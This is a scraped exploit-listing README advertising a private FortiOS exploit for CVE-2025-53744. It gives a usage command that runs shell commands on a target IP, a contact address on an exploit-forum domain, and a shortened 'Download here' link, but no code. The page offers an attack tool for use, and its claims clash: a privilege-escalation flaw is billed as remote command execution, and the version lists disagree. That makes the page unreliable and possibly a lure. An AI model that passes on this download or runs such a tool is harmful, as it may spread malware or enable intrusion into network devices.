Exploit for Incorrect Privilege Assignment in Fortinet Fortios CVE-2025-53744

## https://sploitus.com/exploit?id=F83E404E-F469-5007-8092-EA8A361CF1C0
# CVE-2025-53744-Forti-RCE
#  FortiOS An incorrect privilege assignment vulnerability(CVE-2025-53744)

## Details

- **CVE ID**: [CVE-2025-53744](https://nvd.nist.gov/vuln/detail/cve-2025-53744)
- **Discovered**: 2025-08-12
- **Published**: 2025-08-12
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

An incorrect privilege assignment vulnerability [CWE-266] in FortiOS Security Fabric version 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.0 all versions, 6.4 all versions, may allow a remote authenticated attacker with high privileges to escalate their privileges to super-admin via registering the device to a malicious FortiManager.

## Affected Versions

**FortiOS Security Fabric:**

- 7.6.2 and below
- 7.4 all versions
- 7.0 all versions
- 6.4 all versions


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **cybersecuritist@exploit.in**

## Exploit:
### [Download here](https://bit.ly/4g1CwGs)